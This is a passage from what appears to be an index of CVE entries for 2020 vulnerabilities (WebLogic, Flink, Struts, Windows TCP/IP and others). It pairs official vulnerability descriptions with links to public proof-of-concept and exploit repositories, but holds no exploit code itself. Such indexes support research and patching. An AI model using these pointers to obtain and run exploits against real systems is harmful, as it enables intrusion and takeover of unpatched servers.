[alexfrancow/CVE-2020-14882](https://github.com/alexfrancow/CVE-2020-14882) +- [GGyao/CVE-2020-14882_POC](https://github.com/GGyao/CVE-2020-14882_POC) +- [ludy-dev/Weblogic_Unauthorized-bypass-RCE](https://github.com/ludy-dev/Weblogic_Unauthorized-bypass-RCE) +- [GGyao/CVE-2020-14882_ALL](https://github.com/GGyao/CVE-2020-14882_ALL) +- [ovProphet/CVE-2020-14882-checker](https://github.com/ovProphet/CVE-2020-14882-checker) +- [NS-Sp4ce/CVE-2020-14882](https://github.com/NS-Sp4ce/CVE-2020-14882) +- [mmioimm/cve-2020-14882](https://github.com/mmioimm/cve-2020-14882) +- [QmF0c3UK/CVE-2020-14882](https://github.com/QmF0c3UK/CVE-2020-14882) +- [murataydemir/CVE-2020-14882](https://github.com/murataydemir/CVE-2020-14882) +- [Ormicron/CVE-2020-14882-GUI-Test](https://github.com/Ormicron/CVE-2020-14882-GUI-Test) +- [corelight/CVE-2020-14882-weblogicRCE](https://github.com/corelight/CVE-2020-14882-weblogicRCE) +- [xfiftyone/CVE-2020-14882](https://github.com/xfiftyone/CVE-2020-14882) +- [BabyTeam1024/CVE-2020-14882](https://github.com/BabyTeam1024/CVE-2020-14882) +- [adm1in/CodeTest](https://github.com/adm1in/CodeTest) +- [pwn3z/CVE-2020-14882-WebLogic](https://github.com/pwn3z/CVE-2020-14882-WebLogic) +- [milo2012/CVE-2020-14882](https://github.com/milo2012/CVE-2020-14882) +- [kk98kk0/CVE-2020-14882](https://github.com/kk98kk0/CVE-2020-14882) +- [exploitblizzard/CVE-2020-14882-WebLogic](https://github.com/exploitblizzard/CVE-2020-14882-WebLogic) +- [qianniaoge/CVE-2020-14882_Exploit_Gui](https://github.com/qianniaoge/CVE-2020-14882_Exploit_Gui) +- [N0Coriander/CVE-2020-14882-14883](https://github.com/N0Coriander/CVE-2020-14882-14883) +- [nik0nz7/CVE-2020-14882](https://github.com/nik0nz7/CVE-2020-14882) +- [Danny-LLi/CVE-2020-14882](https://github.com/Danny-LLi/CVE-2020-14882) +- [LucasPDiniz/CVE-2020-14882](https://github.com/LucasPDiniz/CVE-2020-14882) +- [xMr110/CVE-2020-14882](https://github.com/xMr110/CVE-2020-14882) + +### CVE-2020-14883 (2020-10-21) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). + + +- [murataydemir/CVE-2020-14883](https://github.com/murataydemir/CVE-2020-14883) +- [B1anda0/CVE-2020-14883](https://github.com/B1anda0/CVE-2020-14883) +- [fan1029/CVE-2020-14883EXP](https://github.com/fan1029/CVE-2020-14883EXP) +- [Osyanina/westone-CVE-2020-14883-scanner](https://github.com/Osyanina/westone-CVE-2020-14883-scanner) +- [1n7erface/PocList](https://github.com/1n7erface/PocList) +- [amacloudobia/CVE-2020-14883](https://github.com/amacloudobia/CVE-2020-14883) + +### CVE-2020-14947 (2020-06-30) + +OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid. + + +- [mhaskar/CVE-2020-14947](https://github.com/mhaskar/CVE-2020-14947) + +### CVE-2020-14955 (2020-06-26) + +In Jiangmin Antivirus 16.0.13.129, the driver file (KVFG.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x220440. + + +- [intrigus-lgtm/CVE-2020-14955](https://github.com/intrigus-lgtm/CVE-2020-14955) + +### CVE-2020-14965 (2020-06-23) + +On TP-Link TL-WR740N v4 and TL-WR740ND v4 devices, an attacker with access to the admin panel can inject HTML code and change the HTML context of the target pages and stations in the access-control settings via targets_lists_name or hosts_lists_name. The vulnerability can also be exploited through a CSRF, requiring no authentication as an administrator. + + +- [g-rubert/CVE-2020-14965](https://github.com/g-rubert/CVE-2020-14965) + +### CVE-2020-14974 (2020-06-23) + +The driver in IOBit Unlocker 1.1.2 allows a low-privileged user to unlock a file and kill processes (even ones running as SYSTEM) that hold a handle, via IOCTL code 0x222124. + + +- [Aterror2be/CVE-2020-14974](https://github.com/Aterror2be/CVE-2020-14974) + +### CVE-2020-15002 (2020-10-23) + +OX App Suite through 7.10.3 allows SSRF via the the /ajax/messaging/message message API. + + +- [skr0x1c0/Blind-SSRF-CVE-2020-15002](https://github.com/skr0x1c0/Blind-SSRF-CVE-2020-15002) +- [skr0x1c0/SSRF-CVE-2020-15002](https://github.com/skr0x1c0/SSRF-CVE-2020-15002) + +### CVE-2020-15051 (2020-07-15) + +An issue was discovered in Artica Proxy before 4.30.000000. Stored XSS exists via the Server Domain Name, Your Email Address, Group Name, MYSQL Server, Database, MYSQL Username, Group Name, and Task Description fields. + + +- [pratikshad19/CVE-2020-15051](https://github.com/pratikshad19/CVE-2020-15051) + +### CVE-2020-15052 (2020-07-20) + +An issue was discovered in Artica Proxy CE before 4.28.030.418. SQL Injection exists via the Netmask, Hostname, and Alias fields. + + +- [pratikshad19/CVE-2020-15052](https://github.com/pratikshad19/CVE-2020-15052) + +### CVE-2020-15053 (2020-07-20) + +An issue was discovered in Artica Proxy CE before 4.28.030.418. Reflected XSS exists via these search fields: real time request, System Events, Proxy Events, Proxy Objects, and Firewall objects. + + +- [pratikshad19/CVE-2020-15053](https://github.com/pratikshad19/CVE-2020-15053) + +### CVE-2020-15148 (2020-09-15) + +Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory. + + +- [Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses) +- [0xkami/cve-2020-15148](https://github.com/0xkami/cve-2020-15148) + +### CVE-2020-15169 (2020-09-11) + +In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory. + + +- [glasses618/CVE-2020-15169](https://github.com/glasses618/CVE-2020-15169) + +### CVE-2020-15175 (2020-10-07) + +In GLPI before version 9.5.2, the `​pluginimage.send.php​` endpoint allows a user to specify an image from a plugin. The parameters can be maliciously crafted to instead delete the .htaccess file for the files directory. Any user becomes able to read all the files and folders contained in “/files/”. Some of the sensitive information that is compromised are the user sessions, logs, and more. An attacker would be able to get the Administrators session token and use that to authenticate. The issue is patched in version 9.5.2. + + +- [Xn2/GLPwn](https://github.com/Xn2/GLPwn) + +### CVE-2020-15227 (2020-10-01) + +Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. + + +- [Langriklol/CVE-2020-15227](https://github.com/Langriklol/CVE-2020-15227) +- [hu4wufu/CVE-2020-15227](https://github.com/hu4wufu/CVE-2020-15227) +- [filipsedivy/CVE-2020-15227](https://github.com/filipsedivy/CVE-2020-15227) + +### CVE-2020-15228 (2020-10-01) + +In the `@actions/core` npm module before version 1.2.6,`addPath` and `exportVariable` functions communicate with the Actions Runner over stdout by generating a string in a specific format. Workflows that log untrusted data to stdout may invoke these commands, resulting in the path or environment variables being modified without the intention of the workflow or action author. The runner will release an update that disables the `set-env` and `add-path` workflow commands in the near future. For now, users should upgrade to `@actions/core v1.2.6` or later, and replace any instance of the `set-env` or `add-path` commands in their workflows with the new Environment File Syntax. Workflows and actions using the old commands or older versions of the toolkit will start to warn, then error out during workflow execution. + + +- [guettli/fix-CVE-2020-15228](https://github.com/guettli/fix-CVE-2020-15228) + +### CVE-2020-15257 (2020-12-01) + +containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges. This vulnerability has been fixed in containerd 1.3.9 and 1.4.3. Users should update to these versions as soon as they are released. It should be noted that containers started with an old version of containerd-shim should be stopped and restarted, as running containers will continue to be vulnerable even after an upgrade. If you are not providing the ability for untrusted users to start containers in the same network namespace as the shim (typically the "host" network namespace, for example with docker run --net=host or hostNetwork: true in a Kubernetes pod) and run with an effective UID of 0, you are not vulnerable to this issue. If you are running containers with a vulnerable configuration, you can deny access to all abstract sockets with AppArmor by adding a line similar to deny unix addr=@**, to your policy. It is best practice to run containers with a reduced set of privileges, with a non-zero UID, and with isolated namespaces. The containerd maintainers strongly advise against sharing namespaces with the host. Reducing the set of isolation mechanisms used for a container necessarily increases that container's privilege, regardless of what container runtime is used for running that container. + + +- [nccgroup/abstractshimmer](https://github.com/nccgroup/abstractshimmer) + +### CVE-2020-15261 (2020-10-19) + +On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don't have administrative privileges, this vulnerability is only dangerous in anyway unsafe setups. The problem has been fixed in version 4.4.2. As a workaround, the exploitation of the vulnerability can be prevented by revoking administrative privileges from all potentially untrustworthy users. + + +- [yaoyao-cool/CVE-2020-15261](https://github.com/yaoyao-cool/CVE-2020-15261) + +### CVE-2020-15349 (2020-11-17) + +BinaryNights ForkLift 3.x before 3.4 has a local privilege escalation vulnerability because the privileged helper tool implements an XPC interface that allows file operations to any process (copy, move, delete) as root and changing permissions. + + +- [Traxes/Forklift_LPE](https://github.com/Traxes/Forklift_LPE) + +### CVE-2020-15367 (2020-07-07) + +Venki Supravizio BPM 10.1.2 does not limit the number of authentication attempts. An unauthenticated user may exploit this vulnerability to launch a brute-force authentication attack against the Login page. + + +- [inflixim4be/CVE-2020-15367](https://github.com/inflixim4be/CVE-2020-15367) + +### CVE-2020-15368 (2020-06-29) + +AsrDrv103.sys in the ASRock RGB Driver does not properly restrict access from user space, as demonstrated by triggering a triple fault via a request to zero CR3. + + +- [stong/CVE-2020-15368](https://github.com/stong/CVE-2020-15368) +- [R7flex/asrockploit](https://github.com/R7flex/asrockploit) + +### CVE-2020-15392 (2020-07-07) + +A user enumeration vulnerability flaw was found in Venki Supravizio BPM 10.1.2. This issue occurs during password recovery, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames. + + +- [inflixim4be/CVE-2020-15392](https://github.com/inflixim4be/CVE-2020-15392) + +### CVE-2020-15399 +- [mkelepce/CVE-2020-15399](https://github.com/mkelepce/CVE-2020-15399) + +### CVE-2020-15416 (2020-07-28) + +This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6700 V1.0.4.84_10.0.58 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9703. + + +- [k3vinlusec/R7000_httpd_BOF_CVE-2020-15416](https://github.com/k3vinlusec/R7000_httpd_BOF_CVE-2020-15416) + +### CVE-2020-15436 (2020-11-23) + +Use-after-free vulnerability in fs/block_dev.c in the Linux kernel before 5.8 allows local users to gain privileges or cause a denial of service by leveraging improper access to a certain error field. + + +- [Trinadh465/linux-4.19.72_CVE-2020-15436](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-15436) + +### CVE-2020-15492 (2020-07-23) + +An issue was discovered in INNEO Startup TOOLS 2017 M021 12.0.66.3784 through 2018 M040 13.0.70.3804. The sut_srv.exe web application (served on TCP port 85) includes user input into a filesystem access without any further validation. This might allow an unauthenticated attacker to read files on the server via Directory Traversal, or possibly have unspecified other impact. + + +- [patrickhener/CVE-2020-15492](https://github.com/patrickhener/CVE-2020-15492) + +### CVE-2020-15568 (2021-01-30) + +TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. + + +- [n0bugz/CVE-2020-15568](https://github.com/n0bugz/CVE-2020-15568) +- [divinepwner/TerraMaster-TOS-CVE-2020-15568](https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568) + +### CVE-2020-15778 (2020-07-24) + +scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows." + + +- [cpandya2909/CVE-2020-15778](https://github.com/cpandya2909/CVE-2020-15778) +- [Neko-chanQwQ/CVE-2020-15778-Exploit](https://github.com/Neko-chanQwQ/CVE-2020-15778-Exploit) +- [Evan-Zhangyf/CVE-2020-15778](https://github.com/Evan-Zhangyf/CVE-2020-15778) + +### CVE-2020-15780 (2020-07-15) + +An issue was discovered in drivers/acpi/acpi_configfs.c in the Linux kernel before 5.7.7. Injection of malicious ACPI tables via configfs could be used by attackers to bypass lockdown and secure boot restrictions, aka CID-75b0cea7bf30. + + +- [Annavid/CVE-2020-15780-exploit](https://github.com/Annavid/CVE-2020-15780-exploit) + +### CVE-2020-15802 (2020-09-11) + +Devices supporting Bluetooth before 5.1 may allow man-in-the-middle attacks, aka BLURtooth. Cross Transport Key Derivation in Bluetooth Core Specification v4.2 and v5.0 may permit an unauthenticated user to establish a bonding with one transport, either LE or BR/EDR, and replace a bonding already established on the opposing transport, BR/EDR or LE, potentially overwriting an authenticated key with an unauthenticated key, or a key with greater entropy with one with less. + + +- [francozappa/blur](https://github.com/francozappa/blur) + +### CVE-2020-15808 +- [manucuf/CVE202015808](https://github.com/manucuf/CVE202015808) + +### CVE-2020-15848 +- [faklad/CVE-2020-15848](https://github.com/faklad/CVE-2020-15848) + +### CVE-2020-15873 (2020-07-21) + +In LibreNMS before 1.65.1, an authenticated attacker can achieve SQL Injection via the customoid.inc.php device_id POST parameter to ajax_form.php. + + +- [limerencee/cs4239-cve-2020-15873](https://github.com/limerencee/cs4239-cve-2020-15873) + +### CVE-2020-15906 (2020-10-22) + +tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts. + + +- [S1lkys/CVE-2020-15906](https://github.com/S1lkys/CVE-2020-15906) + +### CVE-2020-15916 (2020-07-23) + +goform/AdvSetLanip endpoint on Tenda AC15 AC1900 15.03.05.19 devices allows remote attackers to execute arbitrary system commands via shell metacharacters in the lanIp POST parameter. + + +- [geniuszlyy/CVE-2020-15916](https://github.com/geniuszlyy/CVE-2020-15916) + +### CVE-2020-15931 (2020-10-20) + +Netwrix Account Lockout Examiner before 5.1 allows remote attackers to capture the Net-NTLMv1/v2 authentication challenge hash of the Domain Administrator (that is configured within the product in its installation state) by generating a single Kerberos Pre-Authentication Failed (ID 4771) event on a Domain Controller. + + +- [optiv/CVE-2020-15931](https://github.com/optiv/CVE-2020-15931) + +### CVE-2020-15956 (2020-08-04) + +ActiveMediaServer.exe in ACTi NVR3 Standard Server 3.0.12.42 allows remote unauthenticated attackers to trigger a buffer overflow and application termination via a malformed payload. + + +- [megamagnus/cve-2020-15956](https://github.com/megamagnus/cve-2020-15956) + +### CVE-2020-15999 (2020-11-03) + +Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [oxfemale/CVE-2020-15999](https://github.com/oxfemale/CVE-2020-15999) +- [maarlo/CVE-2020-15999](https://github.com/maarlo/CVE-2020-15999) +- [Marmeus/CVE-2020-15999](https://github.com/Marmeus/CVE-2020-15999) + +### CVE-2020-16012 (2021-01-08) + +Side-channel information leakage in graphics in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to leak cross-origin data via a crafted HTML page. + + +- [aleksejspopovs/cve-2020-16012](https://github.com/aleksejspopovs/cve-2020-16012) + +### CVE-2020-16125 (2020-11-10) + +gdm3 versions before 3.36.2 or 3.38.2 would start gnome-initial-setup if gdm3 can't contact the accountservice service via dbus in a timely manner; on Ubuntu (and potentially derivatives) this could be be chained with an additional issue that could allow a local user to create a new privileged account. + + +- [za970120604/CVE-2020-16125-Reproduction](https://github.com/za970120604/CVE-2020-16125-Reproduction) + +### CVE-2020-16126 (2020-11-11) + +An Ubuntu-specific modification to AccountsService in versions before 0.6.55-0ubuntu13.2, among other earlier versions, improperly dropped the ruid, allowing untrusted users to send signals to AccountService, thus stopping it from handling D-Bus messages in a timely fashion. + + +- [zev3n/Ubuntu-Gnome-privilege-escalation](https://github.com/zev3n/Ubuntu-Gnome-privilege-escalation) + +### CVE-2020-16152 (2021-11-14) + +The NetConfig UI administrative interface in Extreme Networks ExtremeWireless Aerohive HiveOS and IQ Engine through 10.0r8a allows attackers to execute PHP code as the root user via remote HTTP requests that insert this code into a log file and then traverse to that file. + + +- [eriknl/CVE-2020-16152](https://github.com/eriknl/CVE-2020-16152) +- [Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e](https://github.com/Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e) + +### CVE-2020-16270 (2020-10-16) + +OLIMPOKS under 3.3.39 allows Auth/Admin ErrorMessage XSS. Remote Attacker can use discovered vulnerability to inject malicious JavaScript payload to victim’s browsers in context of vulnerable applications. Executed code can be used to steal administrator’s cookies, influence HTML content of targeted application and perform phishing-related attacks. Vulnerable application used in more than 3000 organizations in different sectors from retail to industries. + + +- [Security-AVS/CVE-2020-16270](https://github.com/Security-AVS/CVE-2020-16270) + +### CVE-2020-16846 (2020-11-06) + +An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection. + + +- [zomy22/CVE-2020-16846-Saltstack-Salt-API](https://github.com/zomy22/CVE-2020-16846-Saltstack-Salt-API) +- [hamza-boudouche/projet-secu](https://github.com/hamza-boudouche/projet-secu) + +### CVE-2020-16898 (2020-10-16) + +<p>A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.</p>\n<p>To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.</p>\n<p>The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.</p>\n + + +- [advanced-threat-research/CVE-2020-16898](https://github.com/advanced-threat-research/CVE-2020-16898) +- [corelight/CVE-2020-16898](https://github.com/corelight/CVE-2020-16898) +- [Maliek/CVE-2020-16898_Check](https://github.com/Maliek/CVE-2020-16898_Check) +- [ZephrFish/CVE-2020-16898](https://github.com/ZephrFish/CVE-2020-16898) +- [esnet-security/cve-2020-16898](https://github.com/esnet-security/cve-2020-16898) +- [initconf/CVE-2020-16898-Bad-Neighbor](https://github.com/initconf/CVE-2020-16898-Bad-Neighbor) +- [Q1984/CVE-2020-16898](https://github.com/Q1984/CVE-2020-16898) +- [0xeb-bp/cve-2020-16898](https://github.com/0xeb-bp/cve-2020-16898) +- [jiansiting/cve-2020-16898](https://github.com/jiansiting/cve-2020-16898) +- [CPO-EH/CVE-2020-16898_Workaround](https://github.com/CPO-EH/CVE-2020-16898_Workaround) +- [CPO-EH/CVE-2020-16898_Checker](https://github.com/CPO-EH/CVE-2020-16898_Checker) +- [momika233/CVE-2020-16898-exp](https://github.com/momika233/CVE-2020-16898-exp) +- [komomon/CVE-2020-16898-EXP-POC](https://github.com/komomon/CVE-2020-16898-EXP-POC) +- [komomon/CVE-2020-16898--EXP-POC](https://github.com/komomon/CVE-2020-16898--EXP-POC) + +### CVE-2020-16899 (2020-10-16) + +<p>A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could cause a target system to stop responding.</p>\n<p>To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer. The vulnerability would not allow an attacker to execute code or to elevate user rights directly.</p>\n<p>The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.</p>\n + + +- [advanced-threat-research/CVE-2020-16899](https://github.com/advanced-threat-research/CVE-2020-16899) + +### CVE-2020-16938 (2020-10-16) + +<p>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user’s system.</p>\n<p>To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.</p>\n<p>The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.</p>\n + + +- [ioncodes/CVE-2020-16938](https://github.com/ioncodes/CVE-2020-16938) + +### CVE-2020-16939 (2020-10-16) + +<p>An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context.</p>\n<p>To exploit the vulnerability, an attacker would first have to log on to the system, and then run a specially crafted application to take control over the affected system.</p>\n<p>The security update addresses the vulnerability by correcting how Group Policy checks access.</p>\n + + +- [rogue-kdc/CVE-2020-16939](https://github.com/rogue-kdc/CVE-2020-16939) + +### CVE-2020-16947 (2020-10-16) + +<p>A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the targeted user. If the targeted user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</p>\n<p>Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.</p>\n<p>Note that where severity is indicated as Critical in the Affected Products table, the Preview Pane is an attack vector.</p>\n<p>The security update addresses the vulnerability by correcting how Outlook handles objects in memory.</p>\n + + +- [0neb1n/CVE-2020-16947](https://github.com/0neb1n/CVE-2020-16947) +- [MasterSploit/CVE-2020-16947](https://github.com/MasterSploit/CVE-2020-16947) + +### CVE-2020-17008 +- [jas502n/CVE-2020-17008](https://github.com/jas502n/CVE-2020-17008) + +### CVE-2020-17035 (2020-11-11) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [flamelu/CVE-2020-17035-patch-analysis](https://github.com/flamelu/CVE-2020-17035-patch-analysis) + +### CVE-2020-17057 (2020-11-11) + +Windows Win32k Elevation of Privilege Vulnerability + + +- [fengjixuchui/cve-2020-17057](https://github.com/fengjixuchui/cve-2020-17057) +- [lsw29475/CVE-2020-17057](https://github.com/lsw29475/CVE-2020-17057) + +### CVE-2020-17086 (2020-11-11) + +Raw Image Extension Remote Code Execution Vulnerability + + +- [T81oub/CVE-2020-17086](https://github.com/T81oub/CVE-2020-17086) + +### CVE-2020-17087 (2020-11-11) + +Windows Kernel Local Elevation of Privilege Vulnerability + + +- [revengsh/CVE-2020-17087](https://github.com/revengsh/CVE-2020-17087) +- [ykg88/OHTS_IE6052-CVE-2020-17087](https://github.com/ykg88/OHTS_IE6052-CVE-2020-17087) +- [vp777/Windows-Non-Paged-Pool-Overflow-Exploitation](https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation) +- [raiden757/CVE-2020-17087](https://github.com/raiden757/CVE-2020-17087) + +### CVE-2020-17136 (2020-12-09) + +Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability + + +- [xyddnljydd/CVE-2020-17136](https://github.com/xyddnljydd/CVE-2020-17136) +- [cssxn/CVE-2020-17136](https://github.com/cssxn/CVE-2020-17136) + +### CVE-2020-17144 (2020-12-09) + +Microsoft Exchange Remote Code Execution Vulnerability + + +- [Airboi/CVE-2020-17144-EXP](https://github.com/Airboi/CVE-2020-17144-EXP) +- [zcgonvh/CVE-2020-17144](https://github.com/zcgonvh/CVE-2020-17144) + +### CVE-2020-17382 (2020-10-02) + +The MSI AmbientLink MsIo64 driver 1.0.0.8 has a Buffer Overflow (0x80102040, 0x80102044, 0x80102050,and 0x80102054). + + +- [uf0o/CVE-2020-17382](https://github.com/uf0o/CVE-2020-17382) +- [houseofxyz/CVE-2020-17382](https://github.com/houseofxyz/CVE-2020-17382) + +### CVE-2020-17453 (2021-04-05) + +WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter. + + +- [ydycjz6j/CVE-2020-17453-PoC](https://github.com/ydycjz6j/CVE-2020-17453-PoC) +- [karthi-the-hacker/CVE-2020-17453](https://github.com/karthi-the-hacker/CVE-2020-17453) + +### CVE-2020-17456 (2020-08-19) + +SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page. + + +- [Al1ex/CVE-2020-17456](https://github.com/Al1ex/CVE-2020-17456) +- [TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated) + +### CVE-2020-17496 (2020-08-12) + +vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. + + +- [ctlyz123/CVE-2020-17496](https://github.com/ctlyz123/CVE-2020-17496) +- [ludy-dev/vBulletin_5.x-tab_panel-RCE](https://github.com/ludy-dev/vBulletin_5.x-tab_panel-RCE) + +### CVE-2020-17518 (2021-01-05) + +Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. The files can be written to any location accessible by Flink 1.5.1. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 from apache/flink:master. + + +- [QmF0c3UK/CVE-2020-17518](https://github.com/QmF0c3UK/CVE-2020-17518) +- [murataydemir/CVE-2020-17518](https://github.com/murataydemir/CVE-2020-17518) +- [rakjong/Flink-CVE-2020-17518-getshell](https://github.com/rakjong/Flink-CVE-2020-17518-getshell) + +### CVE-2020-17519 (2021-01-05) + +A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master. + + +- [B1anda0/CVE-2020-17519](https://github.com/B1anda0/CVE-2020-17519) +- [QmF0c3UK/CVE-2020-17519](https://github.com/QmF0c3UK/CVE-2020-17519) +- [dolevf/apache-flink-directory-traversal.nse](https://github.com/dolevf/apache-flink-directory-traversal.nse) +- [hoanx4/CVE-2020-17519](https://github.com/hoanx4/CVE-2020-17519) +- [murataydemir/CVE-2020-17519](https://github.com/murataydemir/CVE-2020-17519) +- [radbsie/CVE-2020-17519-Exp](https://github.com/radbsie/CVE-2020-17519-Exp) +- [yaunsky/CVE-2020-17519-Apache-Flink](https://github.com/yaunsky/CVE-2020-17519-Apache-Flink) +- [Osyanina/westone-CVE-2020-17519-scanner](https://github.com/Osyanina/westone-CVE-2020-17519-scanner) +- [givemefivw/CVE-2020-17519](https://github.com/givemefivw/CVE-2020-17519) +- [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal) +- [zhangweijie11/CVE-2020-17519](https://github.com/zhangweijie11/CVE-2020-17519) + +### CVE-2020-17523 (2021-02-03) + +Apache Shiro before 1.7.1, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass. + + +- [jweny/shiro-cve-2020-17523](https://github.com/jweny/shiro-cve-2020-17523) + +### CVE-2020-17527 (2020-12-03) + +While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests. + + +- [forse01/CVE-2020-17527-Tomcat](https://github.com/forse01/CVE-2020-17527-Tomcat) + +### CVE-2020-17530 (2020-12-11) + +Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. + + +- [secpool2000/CVE-2020-17530](https://github.com/secpool2000/CVE-2020-17530) +- [ka1n4t/CVE-2020-17530](https://github.com/ka1n4t/CVE-2020-17530) +- 